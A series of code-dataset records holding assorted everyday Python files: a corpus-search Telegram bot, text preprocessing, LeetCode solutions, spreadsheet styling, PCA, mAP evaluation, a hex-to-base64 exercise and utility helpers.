'http://search2.ruscorpora.ru/search.xml?env=alpha&mycorp=&mysent=&mysize=&mysentsize=&mydocsize=&dpp=&spp=&spd=&text=lexform&mode=main&sort=&lang=ru&nodia=1&req='\ndef set_request_exact (word):\n word = word.encode ('cp1251')\n word = urllib.parse.quote (word,safe='')\n #word = urllib.urlencode (word)\n string = order_of_arguments_exact + word\n #string = urllib.parse.quote(string)\n return (string)\ndef request_exact (word):\n string = set_request_exact (word)\n return string\n# full\nfirst = 'http://search2.ruscorpora.ru/search.xml?env=alpha&mycorp=&mysent=&mysize=&mysentsize=&mydocsize=&spd=&text=lexgramm&mode=main&sort=gr_tagging&lang=ru&nodia=1'\nd1 = {'parent1':'0','level1':'0','lex1':'','gramm1':'()','sem1':'sem2','sem-mod1':'','flags1':'','m1':''}\nadditional = {'parent':'0','level':'0','min':'1','max':'1','lex':'()','gramm':'()','sem':'','sem-mod':'sem2'}\nmatch = {'pos':'gramm'}\n#\nrequest_dict = {}\nhow_many = 1\ncurrent = 1\n#\ndef set_some_additional_set (i):\n d = {}\n for w in additional:\n d[w+str(i)]= additional[w]\n return d\n\ndef set_request_as_null ():\n global current, how_many, request_dict\n how_many = 1\n current = 1\n request_dict = d1\n d = set_some_additional_set (2)\n for i in d:\n request_dict[i] = d[i]\n return request_dict\n\nrequest_dict = set_request_as_null ()\nprint (request_dict)\n\ndef add_some (cur):\n global current, how_many, request_dict\n d = set_some_additional_set (cur)\n for i in d:\n request_dict[i] = d[i]\n d = set_some_additional_set (cur+1)\n for i in d:\n request_dict[i] = d[i]\n\ndef upd_user_request(i, p):\n global current, how_many, request_dict\n if current > how_many:\n add_some(current)\n where = match[i]+str (current)\n print (where)\n if '(' in request_dict[where]:\n request_dict[where] = request_dict[where][:-1]+'|'+p+')'\n else:\n request_dict[where] = p\n#\n\ndef add_all (f, keyboard, d, name):\n for line in f:\n arr = []\n i = line.split ('\\t')\n i[0] = '- '+i[0]+' -'\n keyboard_POS.add(types.KeyboardButton(text = i[0]))\n d[i[0]] = i[1].strip ('\\n')\n arr.append(i[0])\n keyboard_POS.add (types.KeyboardButton(text = 'сбросить'),\n types.KeyboardButton(text = 'завершить выбор'))\n return keyboard,d,arr\n \n#keyboards for param.\nf = open ('.\\\\keyboards\\\\pos.txt','r',encoding = 'utf-8')\nkeyboard_POS = types.ReplyKeyboardMarkup()\nd_POS = {}\nkeyboard_POS,d_POS,arr_POS = add_all (f, keyboard_POS, d_POS,'pos')\nf.close()\n\n\n#\nkeyboards = {'pos':keyboard_POS}\nmsgs = {'pos': \"Выберите часть речи:\"}\nparams = {'pos':d_POS}\ncomm = ['pos']\n#\nkeyboard_GENERAL = types.ReplyKeyboardMarkup()\nkeyboard_GENERAL.add(types.KeyboardButton(text = '/newsearch'),\n types.KeyboardButton(text = '/setNofword'),\n types.KeyboardButton(text = '/runsearch'))\nf.close()\n#\nall_params = set ()\nfor i in params:\n for w in params[i]:\n all_params.add(w)\n#print (all_params)\n#\ndef get_params(message, i):\n keyboard = keyboards[i]\n bot.send_message(message.chat.id, msgs[i], reply_markup=keyboard)\n#\ndef search_for_params(message):\n if message.text in all_params:\n return True\n else:\n return False\n\ndef set_params (message):\n w = message.text\n for i in params:\n try:\n #print (params[i][w])\n p = params[i][w]\n ii = i\n break\n except:\n continue\n return p, ii\n####################################################################################33\n# COMPLEX SEARCH\ndef create_url ():\n url = first\n for w in request_dict:\n url = url + w+'='+request_dict[w]+'&'\n url = url [:-1]\n print (url)\n return url\n\n\n# этот обработчик запускает функцию send_welcome, когда пользователь отправляет команду /help\n@bot.message_handler(commands=['help','start','newsearch'])\ndef send_welcome(message):\n set_request_as_null ()\n bot.send_message(message.chat.id, '/pos часть речи')\n \n\n@bot.message_handler(commands=['exact'])\ndef send_exact(message):\n word = str (message.text)[7:]\n rqst = request_exact (word)\n bot.send_message(message.chat.id, rqst)\n\n@bot.message_handler(commands=['complex'])\ndef send_complex(message):\n params_text = '/pos часть речи\\n/setNofword какое слово в запросе определить'\n bot.send_message(message.chat.id, params_text)\n\n@bot.message_handler(commands=['setNofword'])\ndef send_complex(message):\n global current, how_many, request_dict\n if len (message.text)<12:\n bot.send_message(message.chat.id, 'Задайте так:\\n/setNofword <ваше число>')\n else:\n try:\n w = int (message.text[11:])\n current = w\n except:\n bot.send_message(message.chat.id, 'Задайте так:\\n/setNofword <ваше число>')\n# !!!!!!!!!!!!!!\n@bot.message_handler(commands=comm)\ndef show_keyboard (message):\n get_params(message,message.text[1:])\n#\n@bot.message_handler(func=search_for_params)\ndef get_p (message):\n p, i = set_params (message)\n upd_user_request(i, p)\n bot.send_message(message.chat.id, msgs[i], reply_markup=keyboard_GENERAL)\n\n@bot.message_handler(commands=['runsearch'])\ndef send_complex(message):\n url = create_url ()\n bot.send_message(message.chat.id, url)\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"nkrya_test/nkrya_bot 1_0.py","file_name":"nkrya_bot 1_0.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262472923","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nIn this file, we will implement the basic steps of text preprocessing.\nThese steps are needed for transferring text from human language to machine-readable format \nfor further processing.\nText normalization includes:\n * converting all letters to lower or upper case\n * converting numbers into words or removing numbers\n * removing punctuations, accent marks and other diacritics\n * removing white spaces\n * expanding abbreviations\n * removing stop words, sparse terms, and particular words\n * text canonicalization\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport re\nfrom nltk import pos_tag, ne_chunk, RegexpParser\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom textblob import TextBlob\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\n\ndef txt_prepration(s: str):\n # try:\n rmv_numbers = re.sub(r'\\d+', '', s) # removing digits\n low = rmv_numbers.lower() # changed all uppercase letters to lower cases\n rmv_symbols = re.sub(r'[^\\w]', ' ', low) # removing symbols\n rmv_spaces = rmv_symbols.strip() # removing Enter Spaces (White Spaces)\n\n stop_words = set(stopwords.words('english')) # removing stop words\n tokens = word_tokenize(rmv_spaces) #\n rmv_stops = [i for i in tokens if not i in stop_words] #\n\n lemmatizer = WordNetLemmatizer() # lemmatization = converting to simple form of words\n lem_str = []\n for word in rmv_stops:\n lem_str.append(lemmatizer.lemmatize(word))\n\n\n s = ' '.join(lem_str) # Chunking (shallow parsing)\n tblob = TextBlob(s)\n tmp = list(str(tblob).split(\" \"))\n #print('value = {}\\n' .format(result1))\n return tmp\n\ndef parse_tree(tokens):\n reg_exp = \"NP: { < DT >? < JJ > * < NN >}\"\n rp = RegexpParser(reg_exp)\n result = rp.parse(tokens)\n result.draw()\n\ndef database_txt_parsed(db):\n num =0\n device_name = db['name']\n device_description = db['description']\n parsed_name = []\n parsed_description = []\n\n for dn in device_name:\n num +=1\n parsed_name.append(txt_prepration(dn,num))\n\n for dn in device_description:\n num +=1\n parsed_description.append(txt_prepration(dn,num))\n\n return parsed_name, parsed_description\n\ndef tf_idf (list_of_strings):\n vectorizer = TfidfVectorizer()\n vectors = vectorizer.fit_transform(list_of_strings)\n feature_names = vectorizer.get_feature_names()\n dense = vectors.todense()\n denselist = dense.tolist()\n df = pd.DataFrame(denselist, columns=feature_names)\n return df\n\ndef text_dic_evaluation(txt, dic):\n prepared_txt = txt_prepration(txt)\n paper_score = 0\n words = dic.iloc[:,0]\n scors = dic.iloc[:,1]\n\n for w in range(len(words)):\n if words.iloc[w] in prepared_txt:\n paper_score += scors.iloc[w]\n return (paper_score)","sub_path":"text_processing.py","file_name":"text_processing.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"403207816","text":"class Solution:\n # @param {integer[]} nums\n # @param {integer} target\n # @return {integer[]}\n def twoSum1(self, nums, target):\n \tlnums = len(nums)\n \tfor i in xrange(lnums):\n \t\tfor j in xrange(i+1,lnums):\n \t\t\tif nums[i] + nums[j] == target:\n \t\t\t\tif nums[i] <= nums[j]:\n \t\t\t\t\treturn [i + 1, j + 1]\n \t\t\t\telse:\n \t\t\t\t\treturn [j + 1, i + 1]\n\n def twoSum2(self, nums, target):\n \tdnums = dict()\n \tfor i in xrange(len(nums)):\n \t\tif target - nums[i] in dnums:\n \t\t\treturn (dnums[target - nums[i]] + 1, i + 1)\n \t\tdnums[nums[i]] = i\n","sub_path":"001 Two_Sum/001 Two_Sum.py","file_name":"001 Two_Sum.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339195608","text":"import os\nimport sys\nimport yaml\nfrom bioblend import toolshed\n\n\"\"\"\nA simple program to update the tool revisions in a tools.yml file.\n\nThe program will either replace the list of revisions with just the latest\nrevision available on the ToolShed, or append the latest revision (if a newer\nrevision is available) to the existing list of revisions.\n\nNOTE: The program doesn't (can't) actually check if an available revision is\n\"newer\" than the current revision, just if they have differnt SHA values. If\nthe revisions are different it is assumed that the version on the ToolShed is\nnewer.\n\nUSAGE:\n\npython .github/scripts/update_tools.py [append|replace] ./production/anvil/tools.yml /path/to/write.yml\n\"\"\"\n\nDEFAULT_TOOLSHED = 'https://toolshed.g2.bx.psu.edu'\n\n# Common keys into the tools dict. Defined solely so our IDE can do completions\n# and I don't consistently misspell revisisions or have to remember if it is\n# toolshed_url or tool_shed_url\nNAME = 'name'\nOWNER = 'owner'\nTOOLS = 'tools'\nSHED = 'tool_shed_url'\nREVISIONS = 'revisions'\n\n# The toolsheds that we have already connected to.\ntool_sheds = { DEFAULT_TOOLSHED: toolshed.ToolShedInstance(DEFAULT_TOOLSHED) }\n\ndef validate(tool):\n \"\"\"Ensure the tool has the fields we need so we don't need to check later.\"\"\"\n if SHED not in tool:\n tool[SHED] = DEFAULT_TOOLSHED\n if REVISIONS not in tool:\n tool[REVISIONS] = []\n\ndef append(tool, revision):\n if revision not in tool[REVISIONS]:\n tool[REVISIONS].append(revision)\n\ndef replace(tool, revision):\n tool[REVISIONS] = [ revision ]\n\ndef update_file(add_to_list, infile, outfile):\n with open(infile, \"r\") as f:\n data = yaml.safe_load(f)\n\n tool_list = data[TOOLS]\n for tool in tool_list:\n print(f\"Getting latest revision for {tool[NAME]}\")\n validate(tool)\n url = tool[SHED]\n if url in tool_sheds:\n ts = tool_sheds[url]\n else:\n ts = toolshed.ToolShedInstance(url)\n tool_sheds[url] = ts\n revs = ts.repositories.get_ordered_installable_revisions(tool[NAME], tool[OWNER])\n if revs and len(revs) > 0:\n add_to_list(tool, revs[-1])\n\n data = { \"tools\": tool_list }\n with open(outfile, \"w\") as f:\n yaml.dump(data, f, default_flow_style=False)\n\nif __name__ == '__main__':\n # Very very simple command line parsing.\n if len(sys.argv) != 4:\n print(f\"ERROR: Expected 3 parameters but found {len(sys.argv)-1}\")\n print(f\"USAGE: python {sys.argv[0]} [append|replace] \")\n sys.exit(1)\n\n mode = None\n if sys.argv[1] == 'append':\n mode = append\n elif sys.argv[1] == 'replace':\n mode = replace\n else:\n print(f\"Invalid mode: {sys.argv[1]}\")\n print(\"Must be one of append or replace\")\n sys.exit(1)\n\n infile = sys.argv[2]\n outfile = sys.argv[3]\n if not os.path.exists(infile):\n print(f\"Could not find the input file {infile}\")\n sys.exit(1)\n\n update_file(mode, infile, outfile)\n","sub_path":".github/scripts/update_tools.py","file_name":"update_tools.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"45545877","text":"class Solution:\n def maxProduct(self, A: List[int]) -> int:\n res = A[0]\n min_ = res\n max_ = res\n \n for i in range(1, len(A)):\n if A[i] < 0:\n min_, max_ = max_, min_\n \n max_ = max(A[i], max_ * A[i])\n min_ = min(A[i], min_ * A[i])\n res = max(max_, res)\n return res","sub_path":"LC152MaximumProductSubarray.py","file_name":"LC152MaximumProductSubarray.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625508531","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport netifaces\nimport sys\n\n#####\nclass ipaddr:\n def __init__(self):\n self._ip = {}\n self._if_name = []\n self._ip_addr = []\n \n for ifn in netifaces.interfaces():\n if ifn == 'lo':\n continue\n \n ifaddrs = netifaces.ifaddresses(ifn)\n\n try:\n ip = ifaddrs[netifaces.AF_INET]\n except(KeyError):\n continue\n\n self._if_name.append(ifn)\n \n self._ip[ifn] = []\n for addr in ip:\n ip1 = addr['addr']\n self._ip[ifn].append(ip1)\n self._ip_addr.append(ip1)\n\n def if_name(self, num=0):\n return self._if_name[num]\n\n def ip_addr(self, num=0):\n return self._ip_addr[num]\n\n def print(self):\n print(self._ip)\n print(self._if_name)\n print(self._ip_addr)\n \n##### Main\ndef main():\n sys.argv.pop(0)\n ip=ipaddr()\n #ip.print()\n print(ip.ip_addr())\n\nif __name__ == '__main__':\n main()\n","sub_path":"ipaddr.py","file_name":"ipaddr.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64078961","text":"'''\nCreated on Feb 28, 2014\n\n@author: theo\n'''\nfrom django.utils.text import slugify\nfrom acacia import settings\n\ndef project_upload(instance, filename):\n return '/'.join(['images',\n slugify(instance.name), \n filename])\n\ndef locatie_upload(instance, filename):\n return '/'.join(['images',\n slugify(instance.project.name), \n slugify(instance.name), \n filename])\n\ndef meetlocatie_upload(instance, filename):\n return '/'.join(['images',\n slugify(instance.project.name), \n slugify(instance.projectlocatie.name), \n slugify(instance.name), \n filename])\n\ndef sourcefile_upload(instance, filename):\n try:\n sourcefile = instance\n datasource = sourcefile.datasource\n meetlocatie = datasource.meetlocatie\n projectlocatie = meetlocatie.projectlocatie\n project = projectlocatie.project\n return '/'.join([slugify(project.name), \n slugify(projectlocatie.name), \n slugify(meetlocatie.name), \n settings.UPLOAD_DATAFILES,\n slugify(datasource.name), \n filename])\n except:\n return '/'.join([settings.UPLOAD_THUMBNAILS, 'files', str(instance.pk), filename])\n \ndef param_thumb_upload(instance, filename):\n try:\n parameter = instance\n datasource = parameter.datasource\n meetlocatie = datasource.meetlocatie\n projectlocatie = meetlocatie.projectlocatie\n project = projectlocatie.project\n return '/'.join([\n slugify(project.name),\n slugify(projectlocatie.name),\n slugify(meetlocatie.name),\n settings.UPLOAD_THUMBNAILS, \n slugify(datasource.name),\n 'parameter', \n filename])\n except:\n return '/'.join([settings.UPLOAD_THUMBNAILS, 'parameter', str(instance.pk), filename])\n \ndef series_thumb_upload(instance, filename):\n try:\n datasource = instance.datasource()\n meetlocatie = instance.meetlocatie()\n projectlocatie = instance.projectlocatie()\n project = instance.project()\n return '/'.join([slugify(project.name),\n slugify(projectlocatie.name),\n slugify(meetlocatie.name),\n settings.UPLOAD_THUMBNAILS, \n slugify(datasource.name),\n 'series', \n filename])\n except:\n return '/'.join([settings.UPLOAD_THUMBNAILS, 'series', str(instance.pk), filename])\n ","sub_path":"acacia/data/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"648566405","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\nfrom openpyxl.styles import Alignment, Font\nfrom openpyxl.styles import Border, colors, PatternFill, Side\nimport sys\n\ncolumnSet = ['B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q']\n\ndef InitFixText(worksheet,Data):\n Year = Data[0]\n Month = Data[1]\n worksheet['B1'] = 'สถิติจำนวน Specimen ประจำเดือน '+ListMonth(Month)+' ปี '+ str(Year)\n Header = ['Heparin/Clot Blood','Clot Blood','Heparin','EDTA','Citrate','ACD','Heparin Whole blood','NaF','กระป๋อง Urine','กระป๋อง Stool','ขวด sterile','ขวด Hemo culture','ขวด Thin prep','Biopsy / Cytology','Other']\n for idx, colH in enumerate(Header):\n worksheet.cell(row=2, column=idx+2).value = colH\n worksheet['A2'] = 'Location\\Sample Type'\n return worksheet\n\ndef InitPosition(worksheet):\n worksheet['B1'].alignment = StyleSheet('AliignMid')\n worksheet['A2'].alignment = StyleSheet('AliignMid')\n for idx in range(17):\n worksheet.cell(row=2, column=idx+1).alignment = StyleSheet('AliignMid')\n return worksheet\n\ndef initSize(worksheet):\n worksheet.column_dimensions['A'].width = 40\n wideSet = [13,13,10,8,9,8,10,6,10,10,8,10,8,11,8,10]\n for idx,i in enumerate(columnSet):\n worksheet.column_dimensions[i].width = wideSet[idx]\n #worksheet.column_dimensions['Q'].width = 16\n worksheet.row_dimensions[1].height = 20\n worksheet.row_dimensions[2].height = 60\n return worksheet\n\ndef initMerge(worksheet):\n worksheet.merge_cells('B1:P1')\n return worksheet\n\ndef initFill(worksheet):\n worksheet['B1'].fill = StyleSheet('FillYellow')\n for idx in range(1,17):\n worksheet.cell(row=2, column=idx+1).fill = StyleSheet('FillGray')\n return worksheet\n\ndef initFont(worksheet, sourceCount):\n worksheet['B1'].font = StyleSheet('FontHead')\n newColumnSet = ['A'] + columnSet\n targetRow = 2\n for i in newColumnSet:\n tar = i + str(targetRow)\n worksheet[tar].font = StyleSheet('FontHead')\n FontArea(worksheet, 1, 17, 3, 3+sourceCount)\n return worksheet\n\ndef initBorder(worksheet,sourceCount):\n StrokeBorder(worksheet, 1, 18, 1, 3+sourceCount)\n return worksheet\n\ndef HighLightGrp(worksheet, sourceGroupList, sourceCount):\n for row in range(3, 3+sourceCount):\n if worksheet.cell(row=row, column=1).value in sourceGroupList:\n worksheet.cell(row=row, column=1).value = worksheet.cell(row=row, column=1).value + \" (Group)\"\n worksheet.cell(row=row, column=1).fill = StyleSheet('FillYellow')\n return worksheet\n\ndef StrokeBorder(workSheet, min_X, max_X, min_Y, max_Y):\n min_X -= 1\n max_X -= 1\n min_Y -= 1\n max_Y -= 1\n BorderStyle = StyleSheet('BorderNor')\n for i, row in enumerate(workSheet):\n if min_Y <= i <= max_Y:\n for j, cell in enumerate(row):\n if min_X <= j <= max_X:\n cell.border = BorderStyle\n return workSheet\n\ndef StyleSheet(key):\n StyleDict = {}\n StyleDict['AliignMid'] = Alignment(horizontal=\"center\",vertical=\"center\",wrap_text=True)\n StyleDict['FillGray'] = PatternFill(start_color='f2f2f2', fill_type='solid')\n StyleDict['FillPurple'] = PatternFill(start_color='ccd9ff', fill_type='solid')\n StyleDict['BorderNor'] = Border(top = Side(border_style='thin', color='FF000000'), \n right = Side(border_style='thin', color='FF000000'), \n bottom = Side(border_style='thin', color='FF000000'),\n left = Side(border_style='thin', color='FF000000'))\n StyleDict['BorderNor_Left'] = Border(left = Side(border_style='thin', color='FF000000'))\n StyleDict['FillYellow'] = PatternFill(start_color='FFFF00', fill_type='solid')\n StyleDict['FontHead'] = Font(name = 'TH SarabunPSK', size = 14, bold = False)\n StyleDict['FontText'] = Font(name = 'TH SarabunPSK', size = 14, bold = False)\n return StyleDict[key]\n\ndef ListMonth(i):\n #month = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December'] \n month = ['มกราคม', 'กุมภาพันธ์', 'มีนาคม', 'เมษายน', 'พฤษภาคม', 'มิถุนายน', 'กรกฎาคม', 'สิงหาคม', 'กันยายน', 'ตุลาคม', 'พฤศจิกายน', 'ธันวาคม'] \n return month[int(i)-1]\n\ndef FontArea(workSheet, min_X, max_X, min_Y, max_Y):\n min_X -= 1;max_X -= 1;min_Y -= 1;max_Y -= 1\n for i, row in enumerate(workSheet):\n if min_Y <= i <= max_Y:\n for j, cell in enumerate(row):\n if min_X <= j <= max_X:\n cell.font = StyleSheet('FontText')\n return workSheet\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Model/Design.py","file_name":"Design.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"269549915","text":"import pandas as pd \r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n\r\n\r\ndf = pd.read_csv('data1.csv', skiprows = 2 ,names=['Labels','Feature 1','Feature 2','Feature 3','Feature 4','Feature 5','Feature 6','Feature 7','Feature 8','Feature 9','Feature 10'])\r\n\r\nfeatures = ['Feature 1','Feature 2','Feature 3','Feature 4','Feature 5','Feature 6','Feature 7','Feature 8','Feature 9','Feature 10']\r\nx = df.loc[:, features].values\r\ny = df.loc[:, ['Labels']].values\r\nx = StandardScaler().fit_transform(x)\r\n\r\npd.DataFrame(data = x, columns = features).head()\r\n\r\npca = PCA()\r\npca.fit_transform(x)\r\nexplained_variance=pca.explained_variance_ratio_\r\nprint(\"The explained variance matrix shows the variance ratios of each component among all the features given. It is printed below\")\r\nfor k in range(0,10):\r\n print(\"Explained variance of FEATURE-{} is {}\".format(k+1,explained_variance[k]))\r\n\r\npca2 = PCA(n_components=2)\r\npca.fit_transform(x)\r\nexplained_variance_best=pca.explained_variance_ratio_ \r\nprint(\"Seting the number of components to two we get the variance ratios of the two features which classify the labels best or hold max percentage of the data\")\r\nfor k in range(0,2):\r\n print(\"Explained variance of BEST FEATURE-{} is {}\".format(k+1,explained_variance_best[k]))\r\n\r\nprint(\"Since the variance ratios of the best features matches with that of FEATURE 1 and FEATURE 2 we conclude that Feature 1 and Feature 2 classify the two levels best and this what is also observed graphically\")\r\n","sub_path":"SRICHANDAN DASH_180102089/PCAcode.py","file_name":"PCAcode.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"336786132","text":"###########################################################################################\n# #\n# This sample shows how to evaluate object detections applying the following metrics: #\n# * Precision x Recall curve ----> used by VOC PASCAL 2012) #\n# * Average Precision (AP) ----> used by VOC PASCAL 2012) #\n# #\n# Developed by: Rafael Padilla (rafael.padilla@smt.ufrj.br) #\n# SMT - Signal Multimedia and Telecommunications Lab #\n# COPPE - Universidade Federal do Rio de Janeiro #\n# Last modification: Oct 9th 2018\n#\n# Adapted and modified by: Christophe Karam #\n###########################################################################################\n\nimport glob\nimport os\nimport shutil\nimport sys\n\nfrom BoundingBox import BoundingBox\nfrom BoundingBoxes import BoundingBoxes\nfrom Evaluator import *\nfrom utils import BBFormat\n\n\n# Validate formats\ndef ValidateFormats(label_format):\n if label_format == 'xywh':\n return BBFormat.XYWH\n elif label_format == 'xyrb':\n return BBFormat.XYX2Y2\n elif label_format is None:\n return BBFormat.XYWH # default when nothing is passed\n else:\n print('Input label format {:s} is invalid.'.format(label_format))\n\ndef getBoundingBoxes(directory, isGT, bbFormat, allBoundingBoxes=None, allClasses=None):\n \"\"\"Read txt files containing bounding boxes (ground truth and detections).\"\"\"\n coordType = CoordinatesType.Absolute\n imgSize = (0, 0)\n if allBoundingBoxes is None:\n allBoundingBoxes = BoundingBoxes()\n if allClasses is None:\n allClasses = []\n # Read ground truths\n os.chdir(directory)\n files = glob.glob(\"*.txt\")\n files.sort()\n # Read GT detections from txt file\n # Each line of the files in the groundtruths folder represents a ground truth bounding box\n # (bounding boxes that a detector should detect)\n # Each value of each line is \"class_id, x, y, width, height\" respectively\n # Class_id represents the class of the bounding box\n # x, y represents the most top-left coordinates of the bounding box\n # x2, y2 represents the most bottom-right coordinates of the bounding box\n for f in files:\n nameOfImage = f.replace(\".txt\", \"\")\n fh1 = open(f, \"r\")\n for line in fh1:\n line = line.replace(\"\\n\", \"\")\n if line.replace(' ', '') == '':\n continue\n splitLine = line.split(\" \")\n if isGT:\n idClass = (splitLine[0]) # class\n x = float(splitLine[1])\n y = float(splitLine[2])\n w = float(splitLine[3])\n h = float(splitLine[4])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.GroundTruth,\n format=bbFormat)\n else:\n idClass = (splitLine[0]) # class\n confidence = float(splitLine[1])\n x = float(splitLine[2])\n y = float(splitLine[3])\n w = float(splitLine[4])\n h = float(splitLine[5])\n bb = BoundingBox(\n nameOfImage,\n idClass,\n x,\n y,\n w,\n h,\n coordType,\n imgSize,\n BBType.Detected,\n confidence,\n format=bbFormat)\n allBoundingBoxes.addBoundingBox(bb)\n if idClass not in allClasses:\n allClasses.append(idClass)\n fh1.close()\n return allBoundingBoxes, allClasses\n\ndef calculate(iou_thresh, gtFolder, detFolder, savePath):\n\n if os.path.exists(gtFolder) is False:\n print('Ground truth directory does not exist. Exiting...')\n sys.exit(0)\n\n if os.path.exists(detFolder) is False:\n print('Prediction directory does not exist. Exiting...')\n sys.exit(0)\n\n if os.path.exists(savePath) is False:\n os.makedirs(savePath)\n\n gtFormat = BBFormat.XYX2Y2\n detFormat = BBFormat.XYX2Y2\n\n # Get groundtruth boxes\n allBoundingBoxes, allClasses = getBoundingBoxes(gtFolder, True, gtFormat)\n # Get detected boxes\n allBoundingBoxes, allClasses = getBoundingBoxes(detFolder, False, detFormat, allBoundingBoxes, allClasses)\n allClasses.sort()\n\n evaluator = Evaluator()\n acc_AP = 0\n validClasses = 0\n\n # Plot Precision x Recall curve\n detections = evaluator.PlotPrecisionRecallCurve(\n allBoundingBoxes, # Object containing all bounding boxes (ground truths and detections)\n IOUThreshold=iou_thresh, # IOU threshold\n method=MethodAveragePrecision.EveryPointInterpolation,\n showAP=True, # Show Average Precision in the title of the plot\n showInterpolatedPrecision=False, # Don't plot the interpolated precision curve\n savePath=savePath,\n showGraphic=False)\n\n f = open(os.path.join(savePath, 'results.txt'), 'w')\n f.write('Object Detection Metrics\\n')\n f.write('https://github.com/rafaelpadilla/Object-Detection-Metrics\\n\\n\\n')\n f.write('Average Precision (AP), Precision and Recall per class:')\n\n # each detection is a class\n for metricsPerClass in detections:\n\n # Get metric values per each class\n cl = metricsPerClass['class']\n ap = metricsPerClass['AP']\n precision = metricsPerClass['precision']\n recall = metricsPerClass['recall']\n totalPositives = metricsPerClass['total positives']\n total_TP = metricsPerClass['total TP']\n total_FP = metricsPerClass['total FP']\n\n if totalPositives > 0:\n validClasses = validClasses + 1\n acc_AP = acc_AP + ap\n prec = ['%.2f' % p for p in precision]\n rec = ['%.2f' % r for r in recall]\n ap_str = \"{0:.2f}%\".format(ap * 100)\n # ap_str = \"{0:.4f}%\".format(ap * 100)\n print('AP: %s (%s)' % (ap_str, cl))\n f.write('\\n\\nClass: %s' % cl)\n f.write('\\nAP: %s' % ap_str)\n f.write('\\nPrecision: %s' % prec)\n f.write('\\nRecall: %s' % rec)\n\n mAP = acc_AP / validClasses\n mAP_str = \"{0:.2f}%\".format(mAP * 100)\n print('mAP: %s' % mAP_str)\n f.write('\\n\\n\\nmAP: %s' % mAP_str)\n return mAP\n\nif __name__ == '__main__':\n\n iou_thresh = 0.75\n groundtruth_dir = '/home/robotics/FYP/Inferences/verb_right_20_scratch/200@45000/eval/gt_tmp'\n prediction_dir = '/home/robotics/FYP/Inferences/verb_right_20_scratch/200@45000/eval/prd_tmp'\n results_dir = '/home/robotics/FYP/Inferences/verb_right_20_scratch/200@45000/eval/mAP@'\n\n mAP = calculate(iou_thresh, groundtruth_dir, prediction_dir, results_dir)\n","sub_path":"ai_pipeline_main/webui/server/utils/map/calculate_map.py","file_name":"calculate_map.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"138954589","text":"#!/usr/bin/python\n\nimport urllib.parse\nimport urllib.request\n\nurl \t\t= 'http://start.csail.mit.edu/'\nvalues \t\t= {'query':'What is the capital of China?'}\n\ndata \t\t= urllib.parse.urlencode(values)\nbinary_data = data.encode('ascii')\nreq \t\t= urllib.request.Request(url, binary_data)\nresponse\t= urllib.request.urlopen(req)\nthe_page\t= response.read()\n\nprint (the_page)\n","sub_path":"pythonCodes/queryUrl.py","file_name":"queryUrl.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"480290569","text":"#!/usr/bin/env python3\nimport codecs\nfrom fn import *\n\n## Convert hex to base64\n\n# The string:\nhexed = b\"49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d\"\n\n# Should produce:\nbase64 = b\"SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t\\n\"\n# So go ahead and make that happen. You'll need to use this code for the rest of the exercises.\n\nunhexed = unhex(hexed)\nunbased = codecs.decode(base64, \"base64\")\n\nassert unhexed == unbased\n\nassert base64 == codecs.encode(unhexed, \"base64\")\nassert hexed == hex(unbased)\n\nprint(codecs.encode(unhexed, \"base64\"))\nprint(base64)\n","sub_path":"c1.py","file_name":"c1.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"525439977","text":"import os\nimport numpy as np\nimport scipy.misc\nimport math\nfrom PIL import Image\nimport json\nimport pickle\nimport re\n\n# Visualising\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as plticker\nfrom shapely.geometry.polygon import Polygon\n\n\nclass Dataset:\n \"\"\"\n The 'Dataset' class provides an interface for working with a 